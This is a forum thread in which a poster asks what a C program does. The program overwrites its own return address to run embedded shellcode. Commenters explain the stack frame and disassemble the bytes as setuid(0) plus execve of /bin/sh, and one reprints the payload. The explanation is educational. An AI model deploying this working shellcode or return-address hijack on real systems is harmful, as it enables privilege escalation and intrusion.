Can anyone explain this code to me?

Posted 2024-08-30 07:20:30 · 663 words · 12 views · 0 comments

WARNING: This is an exploit. Do not execute this code.

//shellcode.c

char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main() { 
    int *ret; //ret pointer for manipulating saved return.

    ret = (int *)&ret + 2; //set ret to point to the saved return
                           //value on the stack.

    (*ret) = (int)shellcode; //change the saved return value to the
                             //address of the shellcode, so it executes.
}

Can anyone give me a better explanation?

Comments (7)

泪冰清 2024-09-06 07:20:30

Apparently, this code attempts to alter the stack so that when main returns, execution does not return normally into the runtime library (which would ordinarily terminate the program) but jumps instead to the code stored in the shellcode array.

1) int *ret;

defines a local variable on the stack, below main's arguments, the return address and the saved ebp register.

2) ret = (int *)&ret + 2;

makes ret point to the location two ints above ret itself on the stack. Supposedly that is where the return address is stored, i.e. the address at which execution continues when main returns.

3) (*ret) = (int)shellcode;

The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.


shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.


P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.


Reply to your second question:

and what happens if I use
ret=(int)&ret +2 and why did we add 2?
why not 3 or 4??? and I think that int
is 4 bytes so 2 will be 8bytes no?

ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:

  • This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).

  • From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.

Now I assume the following stack layout for your program:

+-------------------------+
|  function arguments     |                       |
|  (e.g. argv, argc)      |                       |  (note: the stack
+-------------------------+   <-- ss:esp + 12     |   grows downward!)
|  return address         |                       |
+-------------------------+   <-- ss:esp + 8      V
|  saved ebp register     |                       
+-------------------------+   <-- ss:esp + 4  /  ss:ebp - 0  (see code below)
|  local variable (ret)   |                       
+-------------------------+   <-- ss:esp + 0  /  ss:ebp - 4

At the bottom lies ret (which, as a pointer on 32-bit x86, is 32 bits wide). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments, argc and argv, but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in

ret = (int*)&ret + 2; 

It is + 2 because ret is an int*, and an int is 32 bits wide on this platform, so adding 2 moves the pointer to a memory location 2 × 32 bits (= 64 bits, or 8 bytes) above (int*)&ret, which would be the return address's location if all the assumptions in the above paragraph are correct.


Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):

// first, push all function arguments on the stack in reverse order:
push  argv
push  argc

// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call  main

// (afterwards: clean up stack by removing the function arguments, e.g.:)
add   esp, 8

Inside main, the following might happen:

// create a new stack frame and make room for local variables:
push  ebp
mov   ebp, esp
sub   esp, 4

// access return address:
mov   edi, ss:[ebp+4]

// access argument 'argc'
mov   eax, ss:[ebp+8]

// access argument 'argv'
mov   ebx, ss:[ebp+12]

// access local variable 'ret'
mov   edx, ss:[ebp-4]

...

// restore stack frame and return to caller (by popping the return address)
mov   esp, ebp
pop   ebp
ret

See also: Description of the procedure call sequence in C for another explanation of this topic.

琉璃繁缕 2024-09-06 07:20:30

The actual shellcode is:

(gdb) x /25i &shellcode
0x804a040 <shellcode>:      xor    %eax,%eax
0x804a042 <shellcode+2>:    xor    %ebx,%ebx
0x804a044 <shellcode+4>:    mov    $0x17,%al
0x804a046 <shellcode+6>:    int    $0x80
0x804a048 <shellcode+8>:    jmp    0x804a069 <shellcode+41>
0x804a04a <shellcode+10>:   pop    %esi
0x804a04b <shellcode+11>:   mov    %esi,0x8(%esi)
0x804a04e <shellcode+14>:   xor    %eax,%eax
0x804a050 <shellcode+16>:   mov    %al,0x7(%esi)
0x804a053 <shellcode+19>:   mov    %eax,0xc(%esi)
0x804a056 <shellcode+22>:   mov    $0xb,%al
0x804a058 <shellcode+24>:   mov    %esi,%ebx
0x804a05a <shellcode+26>:   lea    0x8(%esi),%ecx
0x804a05d <shellcode+29>:   lea    0xc(%esi),%edx
0x804a060 <shellcode+32>:   int    $0x80
0x804a062 <shellcode+34>:   xor    %ebx,%ebx
0x804a064 <shellcode+36>:   mov    %ebx,%eax
0x804a066 <shellcode+38>:   inc    %eax
0x804a067 <shellcode+39>:   int    $0x80
0x804a069 <shellcode+41>:   call   0x804a04a <shellcode+10>
0x804a06e <shellcode+46>:   das    
0x804a06f <shellcode+47>:   bound  %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>:   das    
0x804a073 <shellcode+51>:   jae    0x804a0dd
0x804a075 <shellcode+53>:   add    %al,(%eax)

This corresponds roughly to

setuid(0);
x[0] = "/bin/sh";
x[1] = 0;
execve("/bin/sh", &x[0], &x[1]);
exit(0);
故人如初 2024-09-06 07:20:30

That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer overflow exploit), you should really include its origin next time.

From that same document, on how to code stack-based exploits:

/* the shellcode is hex for: */
#include <stdio.h>   /* NULL */
#include <unistd.h>  /* execve */

int main(void) {
    char *name[2];
    name[0] = "sh";
    name[1] = NULL;
    execve("/bin/sh", name, NULL);
    return 1;  /* reached only if execve fails */
}

char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
    "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
    "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

The code you included causes the contents of shellcode[] to be executed, which runs execve and provides access to a shell. As for the term shellcode, from Wikipedia:

In computer security, a shellcode is a
small piece of code used as the
payload in the exploitation of a
software vulnerability. It is called
"shellcode" because it typically
starts a command shell from which the
attacker can control the compromised
machine. Shellcode is commonly written
in machine code, but any piece of code
that performs a similar task can be
called shellcode.

一向肩并 2024-09-06 07:20:30

Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.

The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.

See Smashing The Stack For Fun And Profit for a description of how shellcode such as this can be created and how it might be used.

荒芜了季节 2024-09-06 07:20:30

The string contains a series of bytes represented in hexadecimal.

The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)

The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.

梦太阳 2024-09-06 07:20:30

Each \xXX is one byte written in hexadecimal. One or more such bytes together form an instruction, i.e. an opcode plus its operands (google for it). Together they form machine code, which the processor can execute directly. And this code tries to execute the shellcode.

I think the shellcode tries to spawn a shell.

意犹 2024-09-06 07:20:30

This just spawns /bin/sh, roughly like execve("/bin/sh", NULL, NULL); in C.
